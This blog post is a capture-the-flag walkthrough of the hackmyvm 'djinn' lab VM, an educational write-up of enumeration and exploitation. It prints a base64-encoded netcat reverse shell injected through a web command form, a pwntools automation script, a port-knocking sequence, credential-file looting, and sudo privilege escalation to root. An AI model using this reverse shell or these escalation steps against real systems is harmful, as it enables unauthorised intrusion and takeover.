Skip to content
hackmyvm djinn

hackmyvm – djinn

Published by tomkraz on 26 April 2022

The free CTF Challenge web site “hackmyvm.eu” have another easy level vm called ‘djinn‘ for us to download, enumerate and get some flags. In this write-up will try to describe my method and thought process on how I completed this hackmyvm djinn CTF challenge.

This well put together room has a few tricks up it’s sleeves and will confuse the best of us. Although marked easy, I didn’t find it so. There are a few ways to beat this room but I’ll not put the unintended ones here. If you found one, then great. As I am about learning and the sharing of CTF knowledge, I will do it the intended way (I think).

Table of Contents

Setup for hackmyvm djinn

The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.

My Network,

  • 192.168.186.150 – This is my BlackArch enumeration system.
  • 192.168.186.19 – This is the djinn vm.

For enumeration of the hackmyvm djinn Challenge I will be using my BackArch system build that I created in a previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.

Enumeration

nmap

The first command to run is nmap for network services enumeration.

nmap -F 192.168.186.19
Fast nmap

FTP

So ftp is open. This can be accessed with anonymous ftp with no password

ftp 192.168.186.19
FTP

Seems there are some files to download. They can be all grabbed with the “get” command.

Now we have the files all locally you can take a look at them. I did and the only one I am interested in for now is the one called game.txt. Lets take a look at it.

Time to Play a Game

Taking a look at the port in question we can see there is indeed a game to be played.

nc 192.168.186.19 1227

So we have to answer the question 1000 times to get something useful.

pwntools

This sounds like trouble. Fortunately we can automate the whole lot with Python and pwntools. Take a look at the code below. As this is not a Python Tutorial I wont go into any detail of the code. But I do have a another post with some details of the tubes in pwntools. 

import pwn
server = '192.168.186.19'
port = '1337'

c = pwn.remote(server,port)
c.recvuntil('gift.\n')

count=0

while count < 1001:
  count += 1
  data = c.recvuntil(b")").decode()
  c.recv()

  num1, num2, todo = int(data[1]), int(data[9]), data[5]

  if todo == "+":
   answer= num1 + num2
  elif todo == '-':
   answer= num1 - num2
  elif todo == '*':
   answer= num1 * num2
  elif todo == '/':
   answer= num1 / num2
  c.send((str(answer) + "\n\r").encode())
  print(answer, count)


print(c.recv().decode())

This will put a lot of text to the screen but at the end you will see the below…

ports

Knock Knock

These are ports for port knocking, they have to be knocked in a sequence to open up another port. Which I happen to know is port 22 for ssh.

Run the below command a few times until port 22 is open. 

nmap -p 1356,6784,3409,22 192.168.186.19

So we have opened ssh but we have no username or password so on with the enumeration.

Back to NMap

Lets run a full nmap scan,

nmap -p- 192.168.186.19

This returns a extra port we did not see before,

Whats this port?

Run nmap service detection to find out more. 

nmap -sV -p 7331 192.168.186.19
Its a web server

A Web Server?

Nothing of interest there!

GoBuster!

Lets run gobuster against it. 

gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.186.19:7331

Interesting results

Make a wish
So we can run some commands?

All is not what it seems here. It doesn’t like spaces or full stops or slashes so its not much good. Or is it? But we can put in base64 and get a reverse shell. But first have nc running in a window. 

nc -vlnp 1234

The code below is including my ip address so you will have to re encode it with your ip address. 

echo ` echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTkyLjE2OC4xODYuMTUwIDEyMzQgPi90bXAvZg==" | base64 -d ` | sh -

And you should get a reverse shell!

Now we have a shell you can browse the system looking for the good stuff. In /home/nitish/.dev/creds.txt you can find the login details for a user called “nitish”.

As there is a ssh port open we can just ssh with this user.

User Flag

Once logged in you will find the user flag in the user “nitish” home directory and there are some sudo commands available.

Genie?

So what is this genie, well its a pain and doesn’t give you the wished you asked for. After a lot of messing about with it I found the following.

  • The help (-h) shows some options but one (-cmd) is missing.
  • You can find it if you run the strings command against the binary. 
strings /usr/bin/genie |egrep "^-"

Genie

Run the genie command as the user sam. 

sudo -u sam /usr/bin/genie b -cmd

sam

Now you are the user “sam”

sam

The user sam also has a a sudo option.

So this “/root/lago” is a script with some options. But option 2 is a puzzle and if we get it right we get a prize.

Guess the number.

The prize here is a root shell. I used the below loop an kept hitting “2” and then “Enter” until it was finally right. Took about 50 goes but I just kept hitting “2” and “Enter” as fast as I could. Took about 60 seconds in total.

Run the below command as the user “sam” and then hit the keyboard as fast as you can. 

while true;do sudo /root/lago; done

Sometime later!

root

Root Flag

There is a Root flag is in /root for you to submit.

Wrap Up

I hope you got some value and knowledge. IF you are not familiar with pwntools then I would encourage you to work on learning about the tubes in pwntools as it can be valuable for automating CTFs. And who doesn’t love python!

Published inCTFGetting Started With CTF Challengeshackmyvm.eu

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *